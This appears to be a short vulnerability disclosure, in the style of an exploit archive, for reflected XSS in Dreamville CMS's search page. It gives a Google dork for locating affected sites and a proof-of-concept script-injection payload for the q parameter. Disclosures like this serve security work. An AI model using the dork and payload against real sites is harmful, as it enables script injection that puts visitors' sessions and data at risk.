Dreamville CMS - XSS Reflected
Posted on 30 November -0001
<HTML><HEAD><TITLE>Dreamville CMS - XSS Reflected</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY> ----------------------------------------------------------------------------------------------------------------------------- Title: XSS vuln in Dreamville ! Author: NbSp_ Date: 27/08/2016 ----------------------------------------------------------------------------------------------------------------------------- Description : Du shopping aux services entre particuliers en passant par les artisans et l'actualité locale, consultez toutes les informations dont vous avez besoin dans votre ville touristique. ----------------------------------------------------------------------------------------------------------------------------- Vulnerability : Dork : site:dreamville.fr -site:www.xxx.fr This XSS is on the search engine here : /recherche?q= ! It's a get XSS then : target.dreamville.fr/recherche?q=<%2Fh1><%2Fdiv><script>alert(1)</script> Or on the search engine : <%2Fh1><%2Fdiv><script>alert(1)</script> ----------------------------------------------------------------------------------------------------------------------------- Thanks to : - Implosion & Soukyo - -----------------------------------------------------------------------------------------------------------------------------</BODY></HTML>